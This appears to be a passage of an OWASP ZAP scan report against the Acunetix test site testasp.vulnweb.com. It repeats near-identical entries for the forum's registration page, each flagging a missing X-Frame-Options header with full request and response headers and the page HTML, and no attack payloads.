| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
